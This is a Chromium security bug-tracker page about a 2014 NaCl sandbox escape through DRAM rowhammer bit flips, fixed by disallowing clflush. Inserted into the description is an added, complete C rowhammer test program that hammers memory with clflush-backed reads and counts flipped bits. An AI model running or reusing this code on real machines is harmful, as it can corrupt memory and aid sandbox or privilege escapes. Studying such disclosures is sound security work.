Issue metadata

Status: Fixed
Owner:
Closed: Oct 2014
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Blocked on:
issue nativeclient:3944




Security: NaCl sandbox escape via DRAM "rowhammer" memory corruption

Project Member Reported by mseaborn@chromium.org, Oct 7 2014

Issue description

This is a Chromium tracking issue for issue nativeclient:3944.

Recent research indicated that DRAM can be corrupted by a problem called "rowhammer": https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf

This turns out to be exploitable.  I can reproduce memory corruption on a Thinkpad T420s laptop.  Furthermore, I've written an example exploit program that can escape from NaCl's SFI sandbox by causing bit flips that turn safe, validated code into unsafe code.

This worked because NaCl allowed the x86 "clflush" instruction.  We've changed NaCl to disallow this instruction on trunk (see issue nativeclient:3944).

I think we should backport this fix to other branches of Chrome.
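The following is an added example written for this page, not the exploit program described above and not NaCl code: a minimal rowhammer memory-corruption test in the style of the public rowhammer test programs. It alternates reads of two addresses and uses clflush after each read so that every read goes to DRAM and activates a row, which is exactly why the instruction matters in a sandboxed context. The region size, number of address pairs and iteration counts are assumptions; whether any bits actually flip depends on the DRAM module, on running on bare metal rather than in a VM, and on random pairs landing in the same bank, so a result of zero flips proves nothing.

```c
// Added illustrative example (not the NaCl exploit or NaCl's validator).
// Hammers random pairs of cache lines with clflush-backed reads and then
// scans the region for bits that no longer match the fill pattern.
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

#if defined(__x86_64__) || defined(__i386__)
// clflush evicts the line so the next load is served from DRAM, not cache.
// Without a way to flush, repeated loads would hit cache and never hammer a row.
static inline void flush_line(volatile uint8_t *p) {
    __asm__ volatile("clflush (%0)" :: "r"(p) : "memory");
}
#else
// Assumption: on non-x86 builds this is a no-op so the file still compiles;
// the loop then only exercises the cache and cannot induce DRAM flips.
static inline void flush_line(volatile uint8_t *p) { (void)p; }
#endif

// The hammer loop from the paper: read two addresses, flush both, repeat.
// Returns a sink of the bytes read so the loads cannot be dropped.
uint8_t hammer(volatile uint8_t *a, volatile uint8_t *b, uint64_t iterations) {
    uint8_t sink = 0;
    for (uint64_t i = 0; i < iterations; i++) {
        sink ^= *a;
        sink ^= *b;
        flush_line(a);
        flush_line(b);
    }
    return sink;
}

// Count bits that differ from the fill pattern; any nonzero count is a flip.
uint64_t count_flips(const uint8_t *buf, size_t len, uint8_t pattern) {
    uint64_t flips = 0;
    for (size_t i = 0; i < len; i++)
        flips += (uint64_t)__builtin_popcount((unsigned)(buf[i] ^ pattern));
    return flips;
}

// Map `len` bytes, fill with `pattern`, hammer `rounds` random cache-line
// pairs for `iterations` reads each, and return the number of flipped bits.
// Returns (uint64_t)-1 if the mapping fails.
uint64_t run_test(size_t len, unsigned rounds, uint64_t iterations,
                  uint8_t pattern, unsigned seed) {
    uint8_t *buf = mmap(NULL, len, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) return (uint64_t)-1;
    memset(buf, pattern, len);      // also faults the pages in
    srand(seed);
    size_t lines = len / 64;
    for (unsigned r = 0; r < rounds && lines > 1; r++) {
        // Random virtual addresses: with a large region, some pairs map to
        // different rows of the same DRAM bank, which is what triggers flips.
        size_t a = ((size_t)rand() % lines) * 64;
        size_t b = ((size_t)rand() % lines) * 64;
        if (a == b) continue;
        (void)hammer(buf + a, buf + b, iterations);
    }
    uint64_t flips = count_flips(buf, len, pattern);
    munmap(buf, len);
    return flips;
}

int main(void) {
    // Assumed defaults: 256 MiB region, 100 address pairs, 5M reads per pair.
    uint64_t flips = run_test((size_t)256u << 20, 100, 5000000ULL, 0xFF, 1);
    if (flips == (uint64_t)-1) {
        perror("mmap");
        return 1;
    }
    printf("bit flips observed: %llu\n", (unsigned long long)flips);
    return 0;
}
```

Run it on a physical machine (not a VM, where the hypervisor controls the physical layout) with a larger region and more rounds if you want a meaningful test; the NaCl fix removes the sandboxed program's ability to execute clflush, which is the flush step in the loop above.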

 
Labels: Security_Severity-High Security_Impact-Stable
Status: Available
Owner: shyamsundarr@chromium.org
Status: Assigned
Awaiting Brad Nelson's assistance to help with backporting a NaCl change.

Comment 3 by bugdroid1@chromium.org, Oct 14 2014

Labels: merge-merged-2171
The following revision refers to this bug:
  http://goto.ext.google.com/viewvc/chrome-internal?view=rev&revision=62766

------------------------------------------------------------------
r62766 | bradnelson@google.com | 2014-10-14T19:17:34.673733Z

-----------------------------------------------------------------
Cc: matthewyuan@chromium.org matthewyuan@google.com
Hi Matthew, continuing the email thread here. Let us know if you approve backporting this bugfix into M38/2125? Thanks.
Labels: M-39 M-38 Merge-Approved
Merge Approved for M38.

Comment 6 by ClusterFuzz, Oct 24 2014

Labels: Nag
shyamsundarr@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are unable to reproduce it, please close the bug. (And thanks for fixing the bug!)

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Cc: amin...@google.com amineer@chromium.org
Brad's changes:

http://chromegw.corp.google.com/viewvc/chrome-internal?view=rev&revision=62766

and

http://chromegw.corp.google.com/viewvc/chrome-internal?view=rev&revision=62917

should have brought the NaCl fixes into beta/stable respectively.

Alex/Matt, do we need to do anything to kick off a chromium build/release with these changes or will it be automatic?

Comment 8 by amin...@google.com, Oct 24 2014

Re: beta, the DEPS roll should have been picked up earlier this week, and the latest beta (39.0.2171.36) should already have these changes included.
Labels: -M-38 -Merge-Approved -Nag Release-0-M39
Status: Fixed

Comment 10 by ClusterFuzz, Oct 31 2014

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Cc: jfb@chromium.org
Labels: CVE-2015-0565

Comment 12 by ClusterFuzz, Feb 6 2015

Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Labels: Restrict-View-SecurityEmbargo
Labels: -Restrict-View-SecurityEmbargo
Changing issue to publicly accessible based on http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html

Comment 15 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 16 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-missing
